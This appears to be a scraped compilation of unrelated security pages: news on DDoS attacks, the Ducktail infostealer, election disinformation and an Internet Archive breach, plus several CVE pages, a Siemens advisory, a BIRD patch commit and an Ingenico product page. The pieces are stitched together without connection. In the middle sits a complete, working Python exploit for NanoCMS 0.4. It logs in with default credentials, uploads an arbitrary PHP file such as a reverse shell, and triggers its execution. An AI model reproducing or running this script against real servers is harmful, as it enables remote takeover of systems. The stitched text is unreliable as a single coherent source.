Global organizations and geopolitical entities must adopt new strategies to combat the growing sophistication in attacks that parallel the complexities of our new geopolitical reality.

Source: Dragon Claws via Alamy Stock Photo

COMMENTARY

Today, it's rare for a month to pass without reports of new distributed denial-of-service (DDoS) attacks driven by geopolitical instability. Now, a single attack can include numerous countries and networks. While the war between Russia and Ukraine and elections in NATO countries like Poland drive geopolitically focused DDoS attacks, it's important to understand that these threats were present long before these conflicts, and will be around long after. But why are these attacks against governmental institutions so prominent, and why do they impact all of us in the first place? 

That is partially because changes in political leadership often correlate directly with a spike in DDoS attacks. For example, in Poland, DDoS attack volume increased fourfold within days of its new government being sworn into office. These spikes often result from hacktivist groups (e.g., KillNet, Noname057, Anonymous Sudan) opposing the viewpoints of newly elected officials. They impact the rest of us because DDoS attacks must cross multiple Internet service providers (ISPs) to reach the intended victim. 

Unfortunately, even an attack that is effectively mitigated will use up valuable resources on any ISP network it reaches. We refer to this as the "DDoS tax," which increases the cost of network operation, making it more expensive for everyone. In fact, global ISPs reported a 500% global increase in HTTP/S application layer attacks since 2019, and 17% growth in DNS reflection/amplification volumes in the first half of 2023. Furthermore, it is alarming that carpet-bombing attacks, a technique that simultaneously targets entire IP address ranges, increased by 110% from the first to the second half of 2022, with most attacks occurring against ISP networks.

The bottom line is that there is no escape from DDoS attacks on governmental institutions, and threat intelligence needs to be taken more seriously because of how universal the threat can be when it comes to compromising global ISP networks and additional IT infrastructure. Therefore, it is key for governmental entities to suppress DDoS attacks before they can begin.

**Comprehensive and Adaptive Defenses for Evolving DDoS Attacks**

With nation-states, bad actors often directly target Internet infrastructure to take out critical communications, ecommerce, and other vital infrastructure dependent on Internet connectivity. That means attackers target ISP networks to purposefully degrade Internet connectivity. Further, these bad actors typically have vastly more resources at their disposal than other attackers. They constantly innovate and explore new and more powerful DDoS attack vectors, evidenced by the creation of new ones every year, such as DNS Water Torture and Carpet Bombing. All the while, as DDoS defenses become more effective, bad actors continue to sidestep these defenses with new DDoS attack vectors and methodologies. These advanced techniques invariably find their way into the hands of criminal gangs and even individual hackers, who turn them against any entity from whom they can profit.

With the increased persistence of cybercriminals and the growth in complexity of DDoS attacks, the foundation for a comprehensive DDoS protection solution should identify and stop all types of DDoS attacks before they impact the availability of business-critical services. With today's growing frequency and complexity of DDoS attacks, a multilayer defense strategy is now no longer nice to have, but a requirement. New techniques such as adaptive DDoS strategies, which change vectors based on the defense that is presented, reinforce the need for better agility and efficiency when it comes to managing these increasingly complex attacks.

In the end, threat actors will continue using DDoS attacks as a way to further disrupt and inflame sociopolitical tensions around the world. Security professionals need to consider both local and international conflicts when assessing the DDoS risk factors associated with nation-state attacks. The unfortunate reality is that bad actors continue to find new ways to orchestrate attacks through evolving methodologies. As such, global organizations and geopolitical entities must adopt new strategies right now, such as advanced DDoS defense and suppression, to combat this growing sophistication in attacks that parallel the complexities of our new geopolitical reality.

**About the Author(s)**

Director, Security Solutions, Netscout

Gary is an industry veteran, bringing over 20 years of broad technology experience including routing and switching, wireless, mobility, collaboration, and cloud but always with a focus on security. His previous roles include solutions architect, security SME, sales engineering, consultancy, product management, IT and customer support. Prior to joining Netscout in 2012, he spent 12 years at Cisco Systems and held positions with Avaya and Cable & Wireless.

How Nation-State DDoS Attacks Impact Us All

Categories: News
Categories: Threats
Tags: Ducktail

Tags:  infosteal

Tags:  information stealer

Tags:  Zscaler

Tags:  Trojan

Tags:  Facebook Business

Tags:  Facebook API graph

Tags:  Facebook Ads Manager

Tags:  PHP malware

An information stealer known to go after the Facebook accounts of businesses is now after crypto wallets, too.



(Read more...)




The post New PHP-based Ducktail infostealer is now after crypto wallets appeared first on Malwarebytes Labs.

Posted: October 20, 2022 by

A phishing campaign known to specifically target employees with access to their company's Facebook Business and Ads accounts has significantly widened its net and begun using a first-of-its-kind information-stealing malware to go after crypto wallets.

The Ducktail _(Woo-ooh!)_ campaign was first made public three months ago in July, but it's thought to have been active since 2018. The cybercriminal behind the campaign is thought to be from Vietnam.

**Ducktail 101**

Social engineering attacks and malware form the core of Ducktail's _modus operandi_. In previous campaigns, it used a .NET Core malware that specifically steals Facebook Business and Ads accounts and saved browser credentials. All stolen data was then exfiltrated to its command & control (C2) server, a private Telegram channel.

In this latest campaign, the cybercriminals replaced .NET Core with malware written in PHP. Not only does Ducktail continue to steal Facebook credentials and browser data, but it also steals cryptocurrency wallets, too. These are then stored on a command & control (C2) website in JSON (JavaScript Object Notation) format, wherein texts are easy to understand.

Note that Ducktail also broadened its target to include all Facebook users.

The attacker lures their target into downloading and installing a malicious installer (usually compressed in a ZIP file) by making them believe it's a video game, subtitle, adult video, or cracked MS application file (among others). This ZIP is hosted on popular file-sharing platforms.

Once the file is opened, the malware shows a fake "Checking Application Compatibility" pop-up to distract users while it installs in the background. The malware then executes two processes: The first is for establishing persistence on the affected system, meaning the malicious script is scheduled to run daily and regularly; The second is for data stealing tasks. 

Zscaler researchers broke down the kinds of data this PHP malware steals:

*   Browser information (machine ID, browser version, user profiles). In particular, this malicious script is after sensitive data stored in Chrome browsers. 
*   Information stored in browser cookies
*   Crypto account information from the _wallet.dat_ file
*   Data from various Facebook pages, such as API graph, Ads Manager, and Business, which are not limited to: 
    *   Accounts and their status
    *   Ads payment cycle
    *   Currency details
    *   Funding source
    *   Payment method
    *   PayPal payment method (email address tied to PayPal accounts)
    *   Verification status

Data stored on the C2 website is retrieved and used to conduct further information theft within the affected system. Additional stolen information is fed back to the C2 server.

**Stay safe from the Ducktail infostealer**

As Ducktail uses clever social engineering tactics as the precursor to infection and information theft, it is more important than ever for Facebook users, especially those responsible for their business's Facebook accounts, to be wary of this information stealer's risks. Prevention is key.

*   Never download files not relevant to your work, especially if you're using company-provided computers and mobile devices.
*   Be wary of downloading files from popular file-sharing sites. Malware is usually shared there, too.
*   If something seems too good to be true, it probably is. You'd be better off avoiding it.

If you suspect you've been infected by Ducktail malware and you're a Facebook Business administrator, check if any new users have been added to _Business Manager > Settings > People._ Revoke access to any unknown users with admin access.

Lastly, it is essential to have security software you can count on installed on your computer to protect against risky files that may still end up on the computer, regardless of one's vigilance. Remember that some malware campaigns don't need human intervention to infect systems. You have to watch out for those, too.

Stay safe!

**RELATED ARTICLES**

New PHP-based Ducktail infostealer is now after crypto wallets

There is an unauthorized access vulnerability in Online Diagnostic Lab Management System 1.0.

Submitted by oretnom23 on Wednesday, January 12, 2022 - 09:38.

****Introduction****

This is a simple **PHP Mini-Project** entitled **Online Diagnostic Lab Management System**. This is a web-based application that serves as an online platform for diagnostic labs to manage their patient Laboratory test. The system also allows clients/patients to book an appointment. This simple project can help the said medical lab testing manage the records of the appointment and test result records of their patient. The clients/patients can register their system credentials so to book an appointment and explore the updates about his here diagnostic testing. It has a pleasant user interface and user-friendly functionalities.

****About the Online Diagnostic Lab Management System****

I developed this project using the following:

*   **XAMPP v3.3.0** as my local webserver that has a **PHP Version 8.0.7**
*   **PHP Language**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **jQuery**
*   **Ajax**
*   **Bootstrap**
*   **AdminLTE**
*   and more...

This **Online Diagnostic Lab Management System** has an **Admin Panel** where the Lab's management can update the records, upload the patient's lab testing results. This side of the system requires an **admin** or **staff** user credential in order to access the features and functionalities. The patients can register their accounts easily and book a lab testing appointment on their side. They can list all of their appointment records with the diagnostic lab and also they can check the updated status of their results and download their lab test results.

****Features********Admin Panel****

*   **Secure Login and Logout**
*   **Dashboard**
    *   Display the summary of lists.
*   **Test List Management**
    *   Add New Test
    *   List All Tests
    *   View Test Details
    *   Update Test Details
    *   Delete Test Details
*   **Appointment Management**
    *   List All Appointment
    *   View Appointment Details
    *   List Appointment's Test Details
    *   List Appointment's Update History Details
    *   Update Appointment's Status
    *   Upload test Result/Report
    *   Download Prescription
    *   Download Test Result
    *   Delete Appointment/Test Records
*   **Registered User List Management**
    *   List All Registered User
    *   View Registered User Details
    *   Delete Registered User Details
*   **Manage User List (CRUD)**
*   **Manage Account Details/Credentials**
*   **Manage System Information**

****User-Side****

*   **Secure Login and Registration**
*   **Appointment Management**
    *   Booked an Appointment
    *   List All Appointment
    *   View Appointment Details
    *   List Appointment's Test Details
    *   List Appointment's Update History Details
    *   Cancel Booked Appointment
    *   Download Prescription
    *   Download Test Result
    *   Delete Appointment/Test Records
*   **List All Test Result**
*   **Download Test Result**
*   **Manage Account Details/Credentials**
*   **Logout**

**System Snapshots of some Features****Dashboard _(User-Side)_**

**Appointment Details _(User-Side)_**

**Test Result List Page _(User-Side)_**

**Admin Dashboard _(Admin-Side)_**

**Booked Appointment List _(Admin-Side)_**

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP/WAMP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****Installation/Setup****

1.  Enable the **GDLibrary** in your php.ini file.
2.  **Open** your **XAMPP/WAMP's Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  If you are using **XAMPP**, **copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**. And If you are using **WAMP**, **paste** it into the **"www" directory.**
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** naming ****odlms\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****odlms\_db.sql**** located inside the **database** folder.
8.  **Browse** the **Online Diagnostic Lab Management System** in a **browser**. i.e. ****http://localhost/odlms/**** for the user side and ****http://localhost/odlms/admin**** for the admin side.

**Default Admin Access**

**Username:** admin  
**Password:** admin123

**Sample User Access**

**Email:** \[email protected\]  
**Password:** cblake123

**DEMO VIDEO**

That's it. You can now explore the features and functionalities of this **Online Diagnostic Lab Management System** in **PHP**. I hope this project will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   9264 views

CVE-2022-37151: Online Diagnostic Lab Management System in PHP with Free Source Code

A vulnerability has been identified in syngo Dynamics (All versions < VA40G HF01). syngo Dynamics application server hosts a web service using an operation with improper read access control that could allow files to be retrieved from any folder accessible to the account assigned to the website’s application pool.

**WORKAROUNDS AND MITIGATIONS** 

Siemens Healthineers has identiﬁed the following speciﬁc workarounds and mitigations that customers can apply to reduce the risk:

*   The web services should never be exposed to the Internet (except Web Portal layer)
*   Access to the application server should be limited to only those nodes that require syngo Dynamics functionality

Product-specific remediations or mitigations can be found in the section Affected Products and Solution.  
**Please follow the General Security Recommendations.**

**GENERAL SECURITY RECOMMENDATIONS**

In addition, Siemens Healthineers recommends the following:

*   Ensure you have appropriate backups and system restoration procedures.
*   Securely delete any backup files that are no longer needed.
*   For speciﬁc patch and remediation guidance information contact your local Siemens Healthineers Customer Service Engineer, portal or our Regional Support Center. To ﬁnd your local contact, please refer to https://www.siemens-healthineers.com/en-us/how-can-we-help-you

**PRODUCT DESCRIPTION**

syngo Dynamics Cardiovascular Imaging and Information System (CVIS) is used for the acceptance,  
transfer, display, storage, archive and manipulation of digital medical images, as well as quantification  
and report generation. syngo Dynamics also provides the ability to manage patient information, order  
entry, workflow management and business analytics.

**VULNERABILITY CLASSIFICATION**

The vulnerability classiﬁcation has been performed by using the CVSS scoring system in version 3.1 (CVSS v3.1) (https://www.ﬁrst.org/cvss/). The CVSS environmental score is speciﬁc to the customer’s environment and will impact the overall CVSS score. The environmental score should therefore be individually deﬁned by the customer to accomplish ﬁnal scoring.  
An additional classiﬁcation has been performed using the CWE classiﬁcation, a community-developed list of common software security weaknesses. This serves as a common language and as a baseline for weakness identiﬁcation, mitigation, and prevention efforts. A detailed list of CWE classes can be found at: https://cwe.mitre.org/.

**Vulnerability CVE-2022-42732**  
syngo Dynamics application server hosts a web service using an operation with improper read access  
control that could allow files to be retrieved from any folder accessible to the account assigned to the  
website’s application pool.  
CVSS v3.1 Base Score 7.5  
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C  
CWE CWE-73: External Control of File Name or Path

**Vulnerability CVE-2022-42733**  
syngo Dynamics application server hosts a web service using an operation with improper read access  
control that could allow files to be retrieved from any folder accessible to the account assigned to the  
website’s application pool.  
CVSS v3.1 Base Score 7.5  
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C  
CWE CWE-73: External Control of File Name or Path

**Vulnerability CVE-2022-42734**  
syngo Dynamics application server hosts a web service using an operation with improper write access  
control that could allow to write data in any folder accessible to the account assigned to the website’s  
application pool.  
CVSS v3.1 Base Score 9.1  
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H/E:P/RL:O/RC:C  
CWE CWE-73: External Control of File Name or Path

**Vulnerability CVE-2022-42891**  
syngo Dynamics application server hosts a web service using an operation with improper write access  
control that could allow to write data in any folder accessible to the account assigned to the website’s  
application pool.  
CVSS v3.1 Base Score 9.1  
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H/E:P/RL:O/RC:C  
CWE CWE-73: External Control of File Name or Path

**Vulnerability CVE-2022-42892**  
syngo Dynamics application server hosts a web service using an operation with improper write access  
control that could allow directory listing in any folder accessible to the account assigned to the website’s  
application pool.  
CVSS v3.1 Base Score 9.1  
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H/E:P/RL:O/RC:C  
CWE CWE-23: Relative Path Traversal

**Vulnerability CVE-2022-42893**  
syngo Dynamics application server hosts a web service using an operation with improper write access  
control that could allow to write data in any folder accessible to the account assigned to the website’s  
application pool.  
CVSS v3.1 Base Score 9.1  
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H/E:P/RL:O/RC:C  
CWE CWE-73: External Control of File Name or Path

**Vulnerability CVE-2022-42894**  
An unauthenticated Server-Side Request Forgery (SSRF) vulnerability was identified in one of the  
web services exposed on the syngo Dynamics application that could allow for the leaking of NTLM  
credentials as well as local service enumeration.  
CVSS v3.1 Base Score 5.3  
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C  
CWE CWE-918: Server-Side Request Forgery (SSRF)

**ACKNOWLEDGMENTS** 

Siemens Healthineers thanks the following parties for their efforts:

*   Ryan Wincey from Securifera, Inc. for coordinated disclosure

**ADDITIONAL INFORMATION** 

syngo Dynamics VA20 and older versions are past End of Support.

For further inquiries on security vulnerabilities in Siemens Healthineers products and solutions, please contact Siemens Healthineers using the following link: https://www.siemens-healthineers.com/en-us/support-documentation/cybersecurity

**HISTORY DATA** 

V1.0 (2022-11-17): Publication Date

**TERMS OF USE**

Siemens Healthineers Security Advisories are subject to the terms and conditions contained in Siemens’ Healthineers underlying license terms or other applicable agreements previously agreed to with Siemens Healthineers (hereinafter "License Terms"). To the extent applicable to information, software or docu- mentation made available in or through a Siemens Healthineers Security Advisory, the Terms of Use of Siemens’ Healthineers Global Website (https://www.siemens-healthineers.com/en-us/terms-of-use, hereinafter "Terms of Use"), in particular Sections 8-10 of the Terms of Use, shall apply additionally. In case of conﬂicts, the License Terms shall prevail over the Terms of Use.

CVE-2022-42732: Siemens Healthineers Security Advisory

NanoCMS version 0.4 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-07-26# Exploit Auuthor: p1ckzi# Vendor Homepage: https://github.com/kalyan02/NanoCMS# Version: NanoCMS v0.4# Tested on: Linux Mint 20.3# CVE: N/A## Description:# this script uploads a php reverse shell to the target.# NanoCMS does not sanitise the data of an authenticated user while creating# webpages. pages are saved with .php extensions by default, allowing an# authenticated attacker access to the underlying system:# https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt#!/usr/bin/env python3import argparseimport bs4import errnoimport reimport requestsimport secretsimport sysdef arguments():    parser = argparse.ArgumentParser(        formatter_class=argparse.RawDescriptionHelpFormatter,        description=f"{sys.argv[0]} exploits authenticated file upload"        "\nand remote code execution in NanoCMS v0.4",        epilog=f"examples:"        f"\n\tpython3 {sys.argv[0]} http://10.10.10.10/ rev.php"        f"\n\tpython3 {sys.argv[0]} http://hostname:8080 rev-shell.php -a"        f"\n\t./{sys.argv[0]} https://10.10.10.10 rev-shell -n -e -u 'user'"    )    parser.add_argument(        "address", help="schema/ip/hostname, port, sub-directories"        " to the vulnerable NanoCMS server"    )    parser.add_argument(        "file", help="php file to upload"    )    parser.add_argument(        "-u", "--user", help="username", default="admin"    )    parser.add_argument(        "-p", "--passwd", help="password", default="demo"    )    parser.add_argument(        "-e", "--execute", help="attempts to make a request to the uploaded"        " file (more useful if uploading a reverse shell)",        action="store_true", default=False    )    parser.add_argument(        "-a", "--accessible", help="turns off features"        " which may negatively affect screen readers",        action="store_true", default=False    )    parser.add_argument(        "-n", "--no-colour", help="removes colour output",        action="store_true", default=False    )    arguments.option = parser.parse_args()# settings for terminal output defined by user in term_settings().class settings():    # colours.    c0 = ""    c1 = ""    c2 = ""    # information boxes.    i1 = ""    i2 = ""    i3 = ""    i4 = ""# checks for terminal setting flags supplied by arguments().def term_settings():    if arguments.option.accessible:        small_banner()    elif arguments.option.no_colour:        settings.i1 = "[+] "        settings.i2 = "[!] "        settings.i3 = "[i] "        settings.i4 = "$ "        banner()    elif not arguments.option.accessible or arguments.option.no_colour:        settings.c0 = "\u001b[0m"       # reset.        settings.c1 = "\u001b[38;5;1m"  # red.        settings.c2 = "\u001b[38;5;2m"  # green.        settings.i1 = "[+] "        settings.i2 = "[!] "        settings.i3 = "[i] "        settings.i4 = "$ "        banner()    else:        print("something went horribly wrong!")        sys.exit()# default terminal banner (looks prettier when run lol)def banner():    print(        "\n                                                  .__           .__"        "  .__   "        "\n  ____ _____    ____   ____   ____   _____   _____|  |__   ____ |  "        "| |  |  "        "\n /    \\__   \\  /    \\ /  _ \\_/ ___\\ /     \\ /  ___/  |  \\_/ "        "__ \\|  | |  |  "        "\n|   |  \\/ __ \\|   |  (  <_> )  \\___|  Y Y  \\___  \\|   Y  \\  _"        "__/|  |_|  |__"        "\n|___|  (____  /___|  /\\____/ \\___  >__|_|  /____  >___|  /\\___  "        ">____/____/"        "\n     \\/     \\/     \\/            \\/      \\/     \\/     \\/   "        "  \\/"    )def small_banner():    print(        f"{sys.argv[0]}"        "\nNanoCMS authenticated file upload and rce..."    )# appends a '/' if not supplied at the end of the address.def address_check(address):    check = re.search('/$', address)    if check is not None:        print('')    else:        arguments.option.address += "/"# creates a new filename for each upload.# errors occur if the filename is the same as a previously uploaded one.def random_filename():    random_filename.name = secrets.token_hex(4)# note: after a successful login, credentials are saved, so further reuse# of the script will most likely not require correct credentials.def login(address, user, passwd):    post_header = {        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "        "Gecko/20100101 Firefox/91.0",        "Accept": "text/html,application/xhtml+xml,"        "application/xml;q=0.9,image/webp,*/*;q=0.8",        "Accept-Language": "en-US,en;q=0.5",        "Accept-Encoding": "gzip, deflate",        "Content-Type": "application/x-www-form-urlencoded",        "Content-Length": "",        "Connection": "close",        "Referer": f"{arguments.option.address}data/nanoadmin.php",        "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",        "Upgrade-Insecure-Requests": "1",    }    post_data = {        "user": f"{user}",        "pass": f"{passwd}"    }    url_request = requests.post(        address + 'data/nanoadmin.php?',        headers=post_header,        data=post_data,        verify=False,        timeout=30    )    signin_error = url_request.text    if 'Error : wrong Username or Password' in signin_error:        print(            f"{settings.c1}{settings.i2}could "            f"sign in with {arguments.option.user}/"            f"{arguments.option.passwd}.{settings.c0}"        )        sys.exit(1)    else:        print(            f"{settings.c2}{settings.i1}logged in successfully."            f"{settings.c0}"        )def exploit(address, file, name):    with open(arguments.option.file, 'r') as file:        file_contents = file.read().rstrip()    post_header = {        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "        "Gecko/20100101 Firefox/91.0",        "Accept": "text/html,application/xhtml+xml,"        "application/xml;q=0.9,image/webp,*/*;q=0.8",        "Accept-Language": "en-US,en;q=0.5",        "Accept-Encoding": "gzip, deflate",        "Content-Type": "application/x-www-form-urlencoded",        "Content-Length": "",        "Connection": "close",        "Referer": f"{arguments.option.address}data/nanoadmin.php?action="        "addpage",        "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",        "Upgrade-Insecure-Requests": "1",    }    post_data = {        "title": f"{random_filename.name}",        "save": "Add Page",        "check_sidebar": "sidebar",        "content": f"{file_contents}"    }    url_request = requests.post(        address + 'data/nanoadmin.php?action=addpage',        headers=post_header,        data=post_data,        verify=False,        timeout=30    )    if url_request.status_code == 404:        print(            f"{settings.c1}{settings.i2}{arguments.option.address} could "            f"not be uploaded.{settings.c0}"        )        sys.exit(1)    else:        print(            f"{settings.c2}{settings.i1}file posted."            f"{settings.c0}"        )    print(        f"{settings.i3}if successful, file location should be at:"        f"\n{address}data/pages/{random_filename.name}.php"    )def execute(address, file, name):    print(            f"{settings.i3}making web request to uploaded file."    )    print(            f"{settings.i3}check listener if reverse shell uploaded."        )    url_request = requests.get(        address + f'data/pages/{random_filename.name}.php',        verify=False    )    if url_request.status_code == 404:        print(            f"{settings.c1}{settings.i2}{arguments.option.file} could "            f"not be found."            f"\n{settings.i2}antivirus may be blocking your upload."            f"{settings.c0}"        )    else:        sys.exit()def main():    try:        arguments()        term_settings()        address_check(arguments.option.address)        random_filename()        if arguments.option.execute:            login(                arguments.option.address,                arguments.option.user,                arguments.option.passwd            )            exploit(                arguments.option.address,                arguments.option.file,                random_filename.name,            )            execute(                arguments.option.address,                arguments.option.file,                random_filename.name,            )        else:            login(                arguments.option.address,                arguments.option.user,                arguments.option.passwd            )            exploit(                arguments.option.address,                arguments.option.file,                random_filename.name,            )    except KeyboardInterrupt:        print(f"\n{settings.i3}quitting.")        sys.exit()    except requests.exceptions.Timeout:        print(            f"{settings.c1}{settings.i2}the request timed out "            f"while attempting to connect.{settings.c0}"        )        sys.exit()    except requests.ConnectionError:        print(            f"{settings.c1}{settings.i2}could not connect "            f"to {arguments.option.address}{settings.c0}"        )        sys.exit()    except FileNotFoundError:        print(            f"{settings.c1}{settings.i2}{arguments.option.file} "            f"could not be found.{settings.c0}"        )    except (        requests.exceptions.MissingSchema,        requests.exceptions.InvalidURL,        requests.exceptions.InvalidSchema    ):        print(            f"{settings.c1}{settings.i2}a valid schema and address "            f"must be supplied.{settings.c0}"        )        sys.exit()if __name__ == "__main__":    main()

NanoCMS 0.4 Remote Code Execution

BIRD Internet Routing Daemon 1.6.x through 1.6.7 and 2.x through 2.0.5 has a stack-based buffer overflow. The BGP daemon's support for RFC 8203 administrative shutdown communication messages included an incorrect logical expression when checking the validity of an input message. Sending a shutdown communication with a sufficient message length causes a four-byte overflow to occur while processing the message, where two of the overflow bytes are attacker-controlled and two are fixed.

**Commit 1657c41c** authored Sep 09, 2019 by ![Ondřej Zajíček's avatar](https://secure.gravatar.com/avatar/3ec0675a18cde997948267f2265a626c?s=48&d=identicon "Ondřej Zajíček")

Browse files

**BGP: Fix bugs in handling of shutdown messages**

There is an improper check for valid message size, which may lead to
stack overflow and buffer leaks to log when a large message is received.

Thanks to Daniel McCarney for bugreport and analysis.

Pipeline #52336 passed with stages

in 5 minutes and 6 seconds

*   Changes 1
*   Pipelines 1

...

...

@@ -1539,7 +1539,7 @@ bgp\_handle\_message(struct bgp\_proto \*p, byte \*data, uint len, byte \*\*bp)

return 1;

/\* Handle proper message \*/

if ((msg\_len \> 255) && (msg\_len + 1 \> len))

if (msg\_len + 1 \> len)

return 0;

/\* Some elementary cleanup \*/

...

...

@@ -1555,7 +1555,7 @@ bgp\_handle\_message(struct bgp\_proto \*p, byte \*data, uint len, byte \*\*bp)

void

bgp\_log\_error(struct bgp\_proto \*p, u8 class, char \*msg, unsigned code, unsigned subcode, byte \*data, unsigned len)

{

byte argbuf\[256\], \*t \= argbuf;

byte argbuf\[256+16\], \*t \= argbuf;

unsigned i;

/\* Don't report Cease messages generated by myself \*/

...

...

CVE-2019-16159: BGP: Fix bugs in handling of shutdown messages (1657c41c) · Commits · labs / BIRD Internet Routing Daemon

Russia, Iran, and China are targeting the US election with an evolving array of influence operations in the last days of campaign season.

As November 5 draws closer, the Microsoft Threat Analysis Center (MTAC) warned on Wednesday that malicious foreign influence operations launched by Russia, China, and Iran against the US presidential election are continuing to evolve and should not be ignored even though they have come to feel inevitable. In the group's fifth report, researchers emphasize the range of ongoing activities as well as the inevitability that attackers will work to stoke doubts about the integrity of the election in its aftermath.

In spite of escalating conflict in the Middle East, Microsoft says that Iran has been able to keep up its operations targeting the US election, particularly targeting the Trump campaign and attempting to foment anti-Israel sentiment. Russian actors, meanwhile, have been focused on targeting the Harris campaign with character attacks and AI-generated content, including deepfakes. And China has shifted its focus in recent weeks, researchers say, to target down-ballot Republican candidates as well as sitting members of Congress who promote policies adversarial to China or in conflict with its interests.

Crucially, MTAC says it is all but certain that these actors will attempt to stoke division and mistrust in vote security on Election Day and in its immediate aftermath.

“As MTAC observed during the 2020 presidential cycle, foreign adversaries will amplify claims of election rigging, voter fraud, or other election integrity issues to sow chaos among the US electorate and undermine international confidence in US political stability,” the researchers wrote in their report.

As the 2024 campaign season enters its final phase, the researchers say that they expect to see AI-generated media continuing to show up in new campaigns, particularly because content can spread so rapidly in the charged period immediately around Election Day. The report also notes that Microsoft has detected Iranian actors probing election-related websites and media outlets, “suggesting preparations for more direct influence operations as Election Day nears.”

Chinese actors focusing on US congressional races and other figures also indicates a fluency and far-reaching approach to deploying influence operations. China-backed groups have recently launched campaigns against US representative Barry Moore, and US senators Marsha Blackburn and Marco Rubio (who is not currently up for reelection), pushing corruption allegations and promoting opposing candidates.

MTAC says that many influence campaigns from all of the actors fail to gain traction. But the efforts are still significant, because the narratives that do break through can have significant impact, and the activity in general contributes to the volume and intensity of false and misleading claims circulating in the information landscape surrounding the election.

“History has shown that the ability of foreign actors to rapidly distribute deceptive content can significantly impact public perception and electoral outcomes,” MTAC general manager Clint Watts wrote in a blog post on Wednesday. “With a particular focus on the 48 hours before and after Election Day, voters, government institutions, candidates and parties must remain vigilant to deceptive and suspicious activity online.”

Microsoft Warns Foreign Disinformation Is Hitting the US Election From All Directions

Ingenico Telium 2 POS Telium2 OS allow bypass of file-reading restrictions via the NTPT3 protocol. This is fixed in Telium 2 SDK v9.32.03 patch N.

**Payment Terminals****Answer all payment needs and meet the most demanding use cases**

Ingenico Smart Terminals satisfy the most demanding expectations of merchants, retailers and banks. We bring a consumer-centric approach to vertical markets (including hospitality, retail, vending, banks & acquirers and transportation) with payment solutions to cover all points of transactions.

\- Support any payment method.   
\- Enhance consumer interaction with rich multimedia possibilities.    
\- Meet the latest security standards.

**iSC Series**

Designed for the most demanding payment environments while accelerating check-out and improve consumer engagement. Large color screens, touch capabilities, intuitive interfaces and a wide scope of payment acceptance means are making Ingenico Group’s iSC terminals the best solutions to improve the customers' experience in a variety of merchant settings.

Find out more

**iPP Series**

Ingenico Group’s iPP series (PIN pad) terminals are engineered for all sales segments, especially high transaction volume retail. These devices accept NFC/contactless payment and provide additional privacy and security at the PIN entry stage. They also manage a complete range of payments, helping to generate more revenue for the merchants.

Find out more

**iCT Series**

Choose the right countertop device to fit your business model. Compact, intuitive and easy to use, our countertop POS devices offer swift, secure and adaptable payment options, whatever the volume of your retail transactions. Optional pre-embedded NFC/contactless payment features are just some of the value-added services these devices provide. Plus, multiple-connectivity alternatives – including traditional dial-up, new generation IP, wireless GPRS or Wi-Fi – ensure constant transaction availability.

Find out more

**iWL Series**

Payment flexibility and freedom demands mobile and wireless options. Our anti-shock, water-resistant wireless terminals provide merchants with perfect POS solutions for transactions on the go. Ingenico Group devices are compact and lightweight with wide backlit screens, crisp displays (in vivid color on certain models), fast printers, and extended battery life. Wireless connectivity (GPRS, Bluetooth, and Wi-Fi) ensures the integrity and security of transactions even in the most difficult environments. Never again be restricted by where, how or when you accept payments.

Find out more

**iSelf Series**

The iSelf Series provides easy and flexible unattended payment solutions for self-service business.

Find out more

**Operating System**

**Telium2**

**Ingenico Group’s powerful single software platform.**

Ingenico Group’s Telium2 offers a core operating system that provides standardized architecture for all our new generation POS terminals.

Designed to optimize hardware performance, Telium2 delivers on multiple levels:

*   Reinforces payment security by integrating added features (deletion of sensitive data, terminal cut-off, etc.)
*   Increases transaction speed by leveraging a dual processor architecture
*   Streamlines management of multiple applications and services (credit or debit operations, EMV chip, mobile NFC/contactless payments, mobile top-ups, e-Wallets, loyalty schemes, and more)

**Develop for Telium2**

If you are a developer or integrator, you may use Ingenico Group's Developer Portal to implement your application using our devices and tools. You may register on the site and upon approval, you will gain access to technical documents, software and frequently asked questions. Additionally, on the portal you can register for upcoming technical events.

Login here

Register here  
 

Please note that the Developer Portal currently serves the North America region only - United States and Canada. Please check with your regional Ingenico Group sales representative for development support outside of the North America region.

**Estate Management**

Ingenico makes estate management easy by providing a single central solution adapted to all types of fleets, whatever their size and terminal configurations. Click below to learn more about Ingenico's Estate Management solution.

Learn More

CVE-2018-17766: Ingenico - Telium 2

The Internet Archive has been hit hard by a data breach and several DDoS attacks all around the same time.

A non-profit that benefits millions of people has fallen victim to a data breach and a DDoS attack.

Internet Archive, most known for its Wayback Machine, is a digital library that allows users to look at website snapshots from the past. It is often used for academic research and data analysis.

Cybercriminals managed to breach the site and steal a user authentication database containing 31 million records. The stolen database contains authentication information for registered members, including their email addresses, screen names, password change timestamps, Bcrypt-hashed passwords, and other internal data.

